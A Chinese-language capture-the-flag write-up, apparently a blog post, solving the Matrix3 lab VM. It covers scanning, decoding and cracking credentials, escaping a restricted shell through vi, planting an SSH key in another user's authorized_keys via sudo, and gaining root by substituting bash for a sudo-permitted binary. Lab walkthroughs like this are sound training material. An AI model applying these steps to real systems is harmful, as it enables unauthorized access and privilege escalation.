Matrix3

实验主机:matrix3 靶机一台/Kali linux攻击机一台

实验网络:桥接网络

实验目标:获取靶机的Root权限 得到flag

难易程度:难

一 部署环境

1:下载Virtualbox虚拟化软件

2:下载目标靶机 matrix3并导入Virtualbox

需要修改的内容

3:kal改成桥接

二 测试步骤

第一步:信息收集

步骤一:发现主机

arp-scan -l

步骤二:端口扫描

nmap -A -T4 -p- 192.168.3.142

访问7331端口 为登录窗口 但是没有密码

访问80端口

步骤三:页面提示查看兔子 打开兔子源码发现图片所在位置

步骤四:访问Matrix 发现很多目录 参考大佬文章访问neo64 下载文件直接读取

步骤五:md5解码得到登录名: admin 密码:passwd

步骤六:访问7331端口进行登录

步骤七:目录遍历 再data目录下发现data文件

dirb http://192.168.0.101:7331/ -u admin:passwd -w 

步骤八:下载到本地查看文件类型 发现为windows下的可执行文件 但是未执行成功

file data

步骤九:破解 不会参考大佬操作

https://cloud.tencent.com/developer/article/1472396

破解
john aaa --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt
若是无法破解  就到/usr/share/wordlists这个目录下看rockyou.txt是否未解压,解压后可正常使用    #没用


得到  用户名 guest  密码  7R1n17yN30

第二步:漏洞利用 获取webshell

步骤一:利用得到的登录名:guest 密码:7R1n17yN30进行远程连接

ssh guest@192.168.0.101 -p 6464

步骤二:此用户只能使用很少部分的命令

第三步:权限提升

步骤一:调用/bin/sh 添加环境变量并且调用/usr/bin/bash

vi /bin/sh
进入编辑模式后直接输入以下命令
:!/bin/sh
export PATH=:/bin:/sbin:/usr/bin:/usr/sbin
/usr/bin/bash

步骤二:查看此用户可执行的命令 发现trinity可以无密码使用/bin/sh命令

步骤三:使用guest生成一个ssh密钥 保存到/home/guest/.ssh目录下

步骤四: 使用chmod命令为id_rsa.pub添加可执行权限,可以让trinity用户使用,使用trinity用户将生成的id_rsa.pub复制到trinity家目录下

chmod 777 .ssh
chmod 777 .ssh/id_rsa.pub 
ls -al .ssh/
sudo -u trinity /bin/cp .ssh/id_rsa.pub  /home/trinity/.ssh/authorized_keys

步骤五:远程登陆 用户名:trinity

发现可以以root用户权限无密码使用oracle命令,直接将/usr/bin/bash复制到trinity家目录下并改名为oracle

ssh trinity@127.0.0.1 -i .ssh/id_rsa -p 6464

cp /usr/bin/bash oracle
chmod +x oracle 
ls -la

步骤七: 调用oracle,成功拥有root权限,在root目录下找到flag.txt文件

sudo ./oracle
cd /root/
cat flag.txt

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值